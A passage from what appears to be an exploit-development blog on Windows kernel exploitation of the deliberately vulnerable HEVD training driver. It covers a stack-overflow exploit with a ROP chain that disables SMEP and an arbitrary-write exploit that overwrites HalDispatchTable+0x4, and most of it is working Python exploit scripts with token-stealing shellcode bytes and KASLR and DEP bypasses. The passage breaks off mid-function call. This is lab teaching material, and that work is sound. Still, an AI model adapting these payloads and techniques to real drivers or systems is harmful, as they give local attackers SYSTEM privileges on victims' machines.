)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns 0 on failure)
if not get_drivers:
    print "[-] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = "\x41" * 2056

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		# Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# Sending the overflow buffer to the driver with IOCTL code 0x222003
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

Let’s take a look in WinDbg.

As you can see, we have hit the ret we are going to overwrite.

Before we step through, let’s view the call stack- to see how execution will proceed.

k

Open the image above in a new tab if you are having trouble viewing.

To help better understand the output of the call stack, the column Call Site is going to be the memory address that is executed. The RetAddr column is where the Call Site address will return to when it is done completing.

As you can see, the compromised ret is located at HEVD!TriggerStackOverflow+0xc8. From there we will return to 0xfffff80302c82544, or AuthzBasepRemoveSecurityAttributeValueFromLists+0x70. The next value in the RetAddr column, is the intended value for our CR4 register, 0x00000000000506f8.

Recall that a ret instruction will pop the value at the top of the stack (the value RSP points to) into RIP. Therefore, since our intended CR4 value is located on the stack, it looks as though our first ROP gadget would “return” to 0x00000000000506f8. However, the pop rcx will take that value off of the stack and place it into RCX before the gadget’s ret executes. This means we do not have to worry about returning to that value, which is not a valid memory address.

Upon the ret from the pop rcx ROP gadget, we will jump into the next ROP gadget, mov cr4, rcx, which will load RCX into CR4. That ROP gadget is located at 0xfffff80302d87552, or KiFlushCurrentTbWorker+0x12. To finish things out, we have the location of our user mode code, at 0x0000000000b70000.
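The addresses in this call stack can be cross-checked against the gadget offsets found earlier. The sketch below derives the kernel base from the mov cr4, rcx gadget address and confirms the pop rcx gadget lands where the call stack says it does. All values come from this post; the variable names are just labels for this example.

```python
POP_RCX_OFFSET = 0x3544         # pop rcx ; ret
MOV_CR4_OFFSET = 0x108552       # mov cr4, rcx ; ret

mov_cr4_runtime = 0xfffff80302d87552    # KiFlushCurrentTbWorker+0x12 from the call stack
pop_rcx_runtime = 0xfffff80302c82544    # first return address from the call stack

kernel_base = mov_cr4_runtime - MOV_CR4_OFFSET

print(hex(kernel_base))
print(hex(kernel_base + POP_RCX_OFFSET))
```

Both gadgets resolve to the same base, which is a good sign that the leak from EnumDeviceDrivers() and the rp++ offsets agree with each other.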

After stepping through the vulnerable ret instruction, we see we have hit our first ROP gadget.

Now that we are here, stepping through should pop our intended CR4 value into RCX

Perfect. Stepping through, we should land on our next ROP gadget- which will move RCX (desired value to disable SMEP) into CR4.

Perfect! Let’s disable SMEP!

Nice! As you can see, after our ROP gadgets are executed - we hit our breakpoints (placeholder for our shellcode to verify SMEP is disabled)!

This means we have successfully disabled SMEP, and we can execute user mode shellcode! Let’s finalize this exploit with a working POC. We will merge our payload concepts with the exploit now! Let’s update our script with weaponized shellcode!

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xE8\x02\x00\x00"                      # mov rbx,[rbx+0x2e8] ; ActiveProcessLinks
    "\x48\x81\xEB\xE8\x02\x00\x00"                      # sub rbx,0x2e8       ; Go back to current process
    "\x48\x8B\x8B\xE0\x02\x00\x00"                      # mov rcx,[rbx+0x2e0] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x83\xC4\x40"                                  # add rsp, 0x40       ; RESTORE (Specific to HEVD)
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns 0 on failure)
if not get_drivers:
    print "[-] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = ("\x41" * 2056)

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		        # Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# Sending the overflow buffer to the driver with IOCTL code 0x222003
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

os.system("cmd.exe /k cd C:\\")

This shellcode adds 0x40 to RSP as you can see from above. This is specific to the process I was exploiting, to resume execution. Also in this case, RAX was already set to 0. Therefore, there was no need to xor rax, rax.

As you can see, SMEP has been bypassed!

SMEP Bypass via PTE Overwrite

Perhaps in another blog I will come back to this. I am going to go back and do some more research on the memory management unit and memory paging in Windows. When that research has concluded, I will get into the low level details of overwriting page table entries to turn user mode pages into kernel mode pages. In addition, I will go and do more research on pool memory in kernel mode and look into how pool overflows and use-after-free kernel exploits function and behave.

Thank you for joining me along this journey! And thank you to Morten Schenk, Alex Ionescu, and Intel. You all have aided me greatly.

Please feel free to contact me with any suggestions, comments, or corrections! I am open to it all.

Peace, love, and positivity :-)

Exploit Development: Windows Kernel Exploitation - Arbitrary Overwrites (Write-What-Where)

13 November 2019 at 00:00

Introduction

In a previous post, I talked about setting up a Windows kernel debugging environment. Today, I will be building on the foundation laid in that post. Again, we will be taking a look at the HackSysExtreme vulnerable driver. The HackSysExtreme team implemented a plethora of vulnerabilities here, based on the IOCTL code sent to the driver. The vulnerability we are going to take a look at today is what is known as an arbitrary overwrite.

At a very high level, this means an adversary has the ability to write a piece of data (generally shellcode, or a pointer to it) to a particular, controlled location. As you may recall from my previous post, the reason why we are able to obtain local administrative privileges (NT AUTHORITY\SYSTEM) is because we have the ability to do the following:

  1. Allocate a piece of memory in user land that contains our shellcode
  2. Execute said shellcode from the context of ring 0 in kernel land

Since the shellcode is being executed in the context of ring 0, the most privileged level on the system, the shellcode will be run with kernel privileges. Since our shellcode will copy the NT AUTHORITY\SYSTEM token to a cmd.exe process, our shell will be an administrative shell.

Code Analysis

First let’s look at the ArbitraryWrite.h header file.

Take a look at the following snippet:

typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;
    PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

typedef, in C, allows us to define our own name for a data type. Just as char and int are data types, here we have defined our own data type.

The WRITE_WHAT_WHERE name on the last line is an alias that can now be used to reference struct _WRITE_WHAT_WHERE. Lastly, an aliased pointer type called PWRITE_WHAT_WHERE is created.

Most importantly, we have a pointer called What and a pointer called Where. Essentially now, WRITE_WHAT_WHERE refers to this struct containing What and Where. PWRITE_WHAT_WHERE, when referenced, is a pointer to this struct.
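To make that layout concrete, here is a minimal sketch that mirrors the struct with ctypes. It assumes the 32-bit target used in this post, so each pointer is modeled as a 4-byte integer. The class name WriteWhatWhere32 and the 0x41414141/0x42424242 values are placeholders of my own choosing, not something taken from the driver source.

```python
import ctypes

class WriteWhatWhere32(ctypes.LittleEndianStructure):
    # Mirrors WRITE_WHAT_WHERE as a 32-bit build would lay it out:
    # two pointer-sized (4-byte) fields, What first and Where second.
    _fields_ = [
        ("What", ctypes.c_uint32),
        ("Where", ctypes.c_uint32),
    ]

# Placeholder values, only used to make the byte layout easy to spot
example = WriteWhatWhere32(What=0x41414141, Where=0x42424242)

# Read the raw bytes that would be handed to the driver as the input buffer
raw = ctypes.string_at(ctypes.addressof(example), ctypes.sizeof(example))

print("struct size: {0} bytes".format(ctypes.sizeof(example)))
print("raw bytes: {0!r}".format(raw))
```

The struct is 8 bytes in total: the first 4 bytes are What and the next 4 bytes are Where.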

Moving on down the header file, this is presented to us:

NTSTATUS
TriggerArbitraryWrite(
    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
);

Here, the parameter UserWriteWhatWhere is declared with the data type PWRITE_WHAT_WHERE. As you can recall from above, PWRITE_WHAT_WHERE is a pointer to the struct that contains the What and Where pointers (which will be exploited later on). From now on, UserWriteWhatWhere also points to the struct.

Let’s move on to the source file, ArbitraryWrite.c.

The above function, TriggerArbitraryWrite(), is defined in the source file.

Inside it, local What and Where pointers, named after the members declared earlier in the struct, are initialized as NULL pointers:

PULONG_PTR What = NULL;
PULONG_PTR Where = NULL;

Then finally, we reach our vulnerability:

#else
        DbgPrint("[+] Triggering Arbitrary Write\n");

        //
        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode
        //

        *(Where) = *(What);

As you can see, an adversary could write the value pointed to by What to the memory location referenced by Where. The real issue is that there is no validation, using a Windows API function such as ProbeForRead() or ProbeForWrite(), that confirms whether or not the addresses held in What and Where reside in user mode. Knowing this, we will be able to utilize our user mode shellcode going forward for the exploit.
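The effect of that one line can be modeled safely in user mode. The sketch below is a toy, not driver code: the function name trigger_arbitrary_write is my own, and c_size_t stands in for the pointer-sized ULONG_PTR. It only shows that whoever controls both addresses controls both the value written and its destination.

```python
import ctypes

def trigger_arbitrary_write(what_addr, where_addr):
    # Toy, user-mode model of the driver's "*(Where) = *(What);" statement.
    # No validation is performed on either address, just like the driver.
    value = ctypes.c_size_t.from_address(what_addr).value
    ctypes.c_size_t.from_address(where_addr).value = value

# Two pointer-sized variables in our own process stand in for the
# attacker-chosen source and destination.
source = ctypes.c_size_t(0xDEADBEEF)
target = ctypes.c_size_t(0)

trigger_arbitrary_write(ctypes.addressof(source), ctypes.addressof(target))
print("target now holds: {0}".format(hex(target.value)))
```

In the real exploit, the destination is a kernel address rather than a variable in our own process, which is exactly what the missing probe calls would have rejected.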

IOCTL

As you can recall in the last blog, the IOCTL code that was used to interact with the HEVD vulnerable driver and take advantage of the TriggerStackOverflow() function, occurred at this routine:

After tracing the IOCTL routine that jumps into the TriggerArbitraryOverwrite() function, here is what is displayed:

The above routine is part of a chain as displayed as below:

Now it is time to calculate the IOCTL code, which allows us to interact with the vulnerable routine. Look at the very first routine from above, which was utilized for my last blog post. The IOCTL code was 0x222003. (Notice how the value is only 6 hex digits, even though a 32-bit x86 value is written with 8 digits. 0x222003 = 0x00222003.) The instruction sub eax, 0x222003 will yield a value of zero, and jz short loc_155FB (jump if zero) will jump into the TriggerStackOverflow() function. So, using deductive reasoning, EAX contains a value of 0x222003 just before the subtraction that leads to that jump.

Looking at the second and third routines in the image above:

sub eax, 4
jz short loc_155E3

and

sub eax, 4
jz short loc_155CB

Our goal is to successfully complete the “jump if zero” jump into the applicable vulnerability. In this case, the third routine shown above, will lead us directly into the TriggerArbitraryOverwrite(), if the corresponding “jump if zero” jump is completed.

If the first routine subtracts 0x222003 from EAX, and the two routines after it subtract a combined total of 8 (4 each), let's try adding 8 to the IOCTL code from the last exploit, 0x222003. Adding 8 will give us a value of 0x22200B, or 0x0022200B as a full 32-bit value. That means the first subtraction leaves 8 in EAX, the second routine leaves 4, and by the time EAX reaches the last routine it will be reduced to zero, which takes the applicable jump into the TriggerArbitraryOverwrite() function!
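The arithmetic can be checked with a small simulation of the sub/jz chain. This is a sketch of the three routines described above, not the driver's actual dispatch code. The function name dispatch is my own, and the label for the second routine is a placeholder, since its handler is not named in this post.

```python
def dispatch(ioctl_code):
    # Model EAX as a 32-bit register walking through the sub/jz chain
    eax = ioctl_code & 0xFFFFFFFF

    eax = (eax - 0x222003) & 0xFFFFFFFF     # sub eax, 0x222003
    if eax == 0:                            # jz short loc_155FB
        return "TriggerStackOverflow"

    eax = (eax - 4) & 0xFFFFFFFF            # sub eax, 4
    if eax == 0:                            # jz short loc_155E3
        return "second routine (not named in this post)"

    eax = (eax - 4) & 0xFFFFFFFF            # sub eax, 4
    if eax == 0:                            # jz short loc_155CB
        return "TriggerArbitraryOverwrite"

    return None                             # falls through to routines not covered here

for code in (0x222003, 0x222007, 0x22200B):
    print("{0}: {1}".format(hex(code), dispatch(code)))
```

Only 0x22200B survives the first two comparisons and hits zero on the third, which is why it is the IOCTL code used in the POC.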

Proof Of Concept

Utilizing the newly calculated IOCTL, let’s create a POC:

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

poc = "\x41\x41\x41\x41"                # What
poc += "\x42\x42\x42\x42"               # Where
poc_length = len(poc)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    poc,                                # lpInBuffer
    poc_length,                         # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

After setting up the debugging environment, run the POC. As you can see, What and Where have been cleanly overwritten!

HALp! How Do I Hax?

At the current moment, we have the ability to write a given value at a certain location. How does this help? Let’s talk a bit more on the ability to execute user mode shellcode from kernel mode.

In the stack overflow vulnerability, our user mode memory was directly copied to kernel mode without any check. In this case, however, things are not that straightforward. Here, there is no memory copy DIRECTLY to kernel mode.

However, there is one way we can execute user mode shellcode from kernel mode. Said way is via the HalDispatchTable (Hardware Abstraction Layer Dispatch Table).

Let’s talk about why we are doing what we are doing, and why the HalDispatchTable is important.

The hardware abstraction layer, in Windows, is a part of the kernel that provides routines dealing with hardware/machine instructions. Basically it allows multiple hardware architectures to be compatible with Windows, without the need for a different version of the operating system.

Having said that, there is an undocumented Windows API function known as NtQueryIntervalProfile().

What does NtQueryIntervalProfile() have to do with the kernel? How does the HalDispatchTable even help us? Let’s talk about this.

If you disassemble the NtQueryIntervalProfile() in WinDbg, you will see that a function called KeQueryIntervalProfile() is called in this function:

uf nt!NtQueryIntervalProfile:

If we disassemble the KeQueryIntervalProfile(), you can see the HalDispatchTable actually gets called by this function, via a pointer!

uf nt!KeQueryIntervalProfile:

Essentially, the pointer stored at HalDispatchTable + 0x4 is called by KeQueryIntervalProfile(). If we can overwrite that pointer with a pointer to our user mode shellcode, natural execution will eventually execute our shellcode when NtQueryIntervalProfile() (which calls KeQueryIntervalProfile()) is called!

Order Of Operations

Here are the steps we need to take, in order for this to work:

  1. Enumerate all driver addresses via EnumDeviceDrivers()
  2. Sort through the list of addresses for the address of ntoskrnl.exe (ntoskrnl.exe exports the HalDispatchTable)
  3. Load ntoskrnl.exe into user mode with LoadLibraryExA() and then resolve the HalDispatchTable address via GetProcAddress()
  4. Once the HalDispatchTable address is found, we will calculate the address of HalDispatchTable + 0x4 (by adding 4 bytes), and overwrite that pointer with a pointer to our user mode shellcode

EnumDeviceDrivers()

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns zero on failure)
if not get_drivers:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

This snippet of code enumerates the base addresses for the drivers, and stores them in an array. After the base addresses have been enumerated, we can move on to finding the address of ntoskrnl.exe.

ntoskrnl.exe

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    # 'krnl' matches both ntoskrnl.exe and the PAE kernel image ntkrnlpa.exe
    if 'krnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break

This is a snippet of code that essentially will loop through the array where all of the base addresses have been exported to, and search for ntoskrnl.exe via GetDeviceDriverBaseNameA(). Once that has been found, the address will be stored.

LoadLibraryExA()

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntoskrnl.exe)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

In this snippet, LoadLibraryExA() receives the module name retrieved by GetDeviceDriverBaseNameA() (which is ntoskrnl.exe in this case) and loads that image into our user mode process, returning a handle to it. The snippet below then passes that handle (which still refers to ntoskrnl.exe) to the function GetProcAddress().

GetProcAddress()

hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

GetProcAddress() will reveal to us the address of the HalDispatchTable and HalDispatchTable + 0x4. We are more interested in HalDispatchTable + 0x4.
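The subtract-then-add step in the snippet above is a plain rebasing calculation: take the export's offset inside the user mode copy of the image, then apply it to the kernel mode load address. Here is a minimal sketch of that arithmetic. The function name rebase_export and all three addresses are hypothetical, chosen only for illustration. On a real system they come from LoadLibraryExA(), GetProcAddress(), and EnumDeviceDrivers().

```python
def rebase_export(user_export, user_base, kernel_base, mask=0xFFFFFFFF):
    # Offset of the export inside the image is the same in both mappings,
    # so only the base address needs to be swapped. Masked to 32 bits (x86).
    offset = user_export - user_base
    return (kernel_base + offset) & mask

# Hypothetical values for illustration only
user_base = 0x00400000      # where LoadLibraryExA() mapped the image in our process
user_hal = 0x0052A3F8       # what GetProcAddress() returned for HalDispatchTable
kernel_base = 0x82800000    # kernel load address reported by EnumDeviceDrivers()

hal = rebase_export(user_hal, user_base, kernel_base)
real_hal = hal + 0x4        # second entry of the table on 32-bit (4-byte pointers)

print("[+] HAL location: {0}".format(hex(hal)))
print("[+] HAL + 0x4 location: {0}".format(hex(real_hal)))
```

The 0x4 offset is tied to 4-byte pointers, so it only holds for the 32-bit target used in this post.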

Once we have the address for HalDispatchTable + 0x4, we can weaponize our exploit:

# HackSysExtreme Vulnerable Driver Kernel Exploit (Arbitrary Overwrite)
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

payload = bytearray(
    "\x90\x90\x90\x90"                # NOP sled
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x31\xc0"                        # xor eax, eax (restore execution)
    "\x83\xc4\x24"                    # add esp, 0x24 (restore execution)
    "\x5d"                            # pop ebp
    "\xc2\x08\x00"                    # ret 0x8
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Python, when using id to return a value, creates an offset of 20 bytes to the value (first bytes reference variable)
# After id returns the value, it is then necessary to increase the returned value by 20 bytes
payload_address = id(payload) + 20
payload_updated = struct.pack("<L", ptr)
payload_final = id(payload_updated) + 20

# Location of shellcode update statement
print "[+] Location of shellcode: {0}".format(hex(payload_address))

# Location of pointer to shellcode
print "[+] Location of pointer to shellcode: {0}".format(hex(payload_final))

# The goal is to eventually locate HAL table.
# HAL is exported by ntoskrnl.exe
# ntoskrnl.exe's location can be enumerated via EnumDeviceDrivers() and GetDeviceDriverBaseNameA() functions via Windows API.

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns zero on failure)
if not get_drivers:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    # 'krnl' matches both ntoskrnl.exe and the PAE kernel image ntkrnlpa.exe
    if 'krnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break
    
# Now that all of the proper information to reference HAL has been enumerated, it is time to get the location of HAL and HAL + 0x4
# NtQueryIntervalProfile is an undocumented Windows API function that references HAL at the location of HAL + 0x4.
# HAL + 0x4 is the address we will eventually need to write over. Once HAL is exported, we will be most interested in HAL + 0x4

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntoskrnl.exe)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

# Getting HAL Address
hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))


# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    write_what_where_pointer,           # lpInBuffer
    0x8,                                # nInBufferSize
